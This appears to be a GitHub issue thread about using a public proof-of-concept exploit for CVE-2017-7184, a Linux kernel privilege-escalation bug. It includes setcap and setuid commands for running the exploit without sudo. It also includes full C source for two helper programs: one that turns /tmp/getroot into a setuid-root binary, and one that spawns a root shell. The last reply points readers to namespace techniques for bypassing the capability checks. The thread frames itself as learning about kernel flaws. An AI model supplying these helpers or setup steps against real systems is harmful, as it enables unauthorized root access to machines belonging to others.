the usage of cve-2017-7184

Question

the usage of cve-2017-7184

Closed this issue 8 years ago · 6 comments

hi, snorez, what is the usage of cve-2017-7184? Is it sudo setcap cap_net_raw,cap_net_admin=eip ./xxx? but it didn't work.

Answer 1 · 2017-05-15T11:24:56.000Z

@sucof yes, that should work. Which kernel version are you testing? Oh, also, you need two extra files, "/tmp/nm"(which will setuid /tmp/getroot), another is "/tmp/getroot". These files are quite simple. I forget to mention that, sorry :(.

Answer 2 · 2017-05-16T02:15:29.000Z

@snorez , I think use sudo command is odd for a eop vulnerability, if some one have password to use sudo, maybe them have no need a exploit of eop, right? Another, for creating these two temp files, is it better that use sprintf, mktemp and other code to get the root shell?

Answer 3 · 2017-05-16T02:22:45.000Z

for sudo problem, I think there is a solution:

#groupadd -g XXX
#usermod -a -G XXX YYY
#chgrp wireshark path/to/exploit
#chmod 4750 path/to/exploit
#setcap cap_net_raw,cap_net_admin=eip path/to/exploit

But I have not test it :(.

Answer 4 · 2017-05-16T02:40:23.000Z

@sucof yes, that is right. There is a way to bypass the capabilities checking by using namespace. I focus on understanding this flaw, so this exploit is more for testing purpose. Thank you for your mention.

Answer 5 · 2017-05-17T07:42:46.000Z

@snorez thank your replay, I am a comer for learn eop of linux, so forgive me a lot of questions, can you share your "/tmp/nm" and "/tmp/getroot" files for me, I can't get the root shell, my kernel version is: 4.8.0-22-generic, I am not sure my files is right,thanks.

Answer 6 · 2017-05-18T11:51:14.000Z

@sucof yes,
getroot.c

#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

static char *exec_cmd = "/bin/sh";

int main(int argc, char *argv[])
{
	if ((getuid() == 0) || (geteuid() == 0)) {
		setuid(0);
		setgid(0);
		setreuid(0, 0);
		setregid(0, 0);
		execl(exec_cmd, exec_cmd, NULL);
	} else {
		printf("get root failed\n");
	}
	return 0;
}

nm.c

#include <unistd.h>
#include <sys/stat.h>

char *root_file = "/tmp/getroot";

int main(int argc, char *argv[])
{
	chown(root_file, 0, 0);
	chmod(root_file, S_ISUID | S_IRWXU | S_IRWXG | S_IRWXO);
	return 0;
}

BTW, I am also a newbie here.
here are some more professional exploits xairy's exploits. check cve-2017-7308 to see how to bypass the capabilities checking.